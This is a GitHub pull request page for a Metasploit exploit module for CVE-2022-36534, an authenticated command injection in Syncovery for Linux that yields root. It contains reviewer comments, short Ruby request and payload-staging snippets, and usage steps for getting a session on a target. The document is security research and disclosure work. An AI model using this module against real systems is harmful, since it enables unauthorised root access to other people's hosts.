-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Syncovery For Linux - Auth. RCE (CVE-2022-36534) #16992
Conversation
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools. We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
You can automate most of these changes with the
Please update your branch after these have been made, and reach out if you have any problems. |
Hi, any suggestion on how to fix this? |
The tests are failing due to a
send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/post_applogin.php?login=#{datastore['USERNAME'] }) Do: send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/post_applogin.php'),
'vars_get' => { 'login' => datastore['USERNAME'].to_s }
}) |
Thanks! This should do the trick. |
This comment was marked as spam.
This comment was marked as spam.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks again @whoot for the exploit module! I left some comments and suggestions for you to review when you get a chance.
One more thing I would like to suggest is the use of the CmdStager
. Please, refer to the documentation for details. The main benefit of using the CmdStager
is that it is possible to send payloads of any size. the mixin will take care of splitting it up and rebuild it on the target before executing. Basically, you will just have to move the code from exploit
to a new execute_command
method and use something along these lines in the exploit
method, assuming you setup the targets as I suggested in this comment:
case target['Type']
when :unix_memory
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
This module is a good example.
documentation/modules/exploit/unix/http/syncovery_linux_rce_2022_36534.md
Outdated
Show resolved
Hide resolved
Thanks @whoot! These changes look good to me. However, it doesn't seem to work properly in my environment:
I tracked down the issue and it looks like the profile gets deleted before the payload is executed. I just added a
That said, using Regarding using the |
I will look into it and see what I can do. |
Tried to use the cleanup method and file_rm, but always getting the following error message:
Meterpreter shell is there, but cleanup of log files is not working. |
Did as much as I could, but could not solve the "undefined local variable or method 'session'" issue. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for updating this @whoot ! I added some suggestions to handle the issue you reported. Please, let me know if this works for you.
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
So, I think the module is good to go now. Thank you so so much for your support and for helping me out with all this stuff. Really appreciate it! |
Thanks @whoot ! I'm happy to hear the feedback was useful! It looks good to me now! I tested against Syncovery version 9.47a and I got a session as the root user. I'll go ahead and land it!
|
Release NotesThis adds a module that exploits an authenticated remote code execution vulnerability identified as CVE-2022-36534 in the Web GUI of Syncovery File Sync & Backup Software for Linux. The module leverages a flaw in the application that allows the creation of jobs that will be executed when a profile is run. This allows the execution of arbitrary commands as the root user. |
This pull request adds the following module for a vulnerability found in Syncovery for Linux.
The vulnerability has been communicated to the vendor and is fixed in the current release. CVE is pending.
A vulnerable version can be downloaded from the vendor website: https://www.syncovery.com/release/Syncovery-9.47a-amd64.deb
CVE-2022-36534: Authenticated Remote Code Execution
Syncovery allows users to execute a command or script before/after running a profile.
Since it is possible to inject arbitrary commands an authenticated attacker can get root access to the host by inserting a crafted payload.
Verification
Download and install a vulnerable version
use exploit/unix/http/syncovery_linux_rce_2022_36534
set RHOSTS <TARGET HOSTS>
set LHOST <Address of Attacking Machine>
run
root
user.More information can be found on our website: https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/